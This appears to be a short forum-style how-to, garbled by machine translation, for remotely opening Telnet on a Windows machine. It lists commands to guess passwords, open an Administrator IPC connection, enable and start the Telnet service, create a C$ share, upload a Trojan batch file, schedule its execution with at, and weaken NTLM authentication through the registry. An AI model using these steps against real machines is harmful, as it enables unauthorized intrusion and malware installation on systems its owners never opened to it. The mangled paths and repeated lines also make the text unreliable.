How can I remotely enable the telnet service? How can I remotely enable the telnet service?
0. Detect remote machine passwords-
1. Run the netuse command to establish an IPC connection to net use/IP password/User: Administrator.
Use the SC command to change the disabled Telnet service to automatic SC/IP config TlntSvr start = auto
2. Run the SC command to start SC/IP start TlntSvr.
3. NET Share create C $ share net share sharename = drive: Path
4. Copy command upload Trojan copy A. BAT/192.168.0.1c $
5. regularly execute at/192.168.0.1 time cmd of the at command. Note: if the other party adopts the NTLM authentication policy, you can connect to the network registry to modify the NTLM key value under hkeylocal machinesoftwaremicrosofttelnetserver1.0 from 2 to 0. Then restart the telnet service.
6. Run the SC command to disable SC/IP stop TlntSvr -- 7. Run the SC command to start SC/IP start TlntSvr.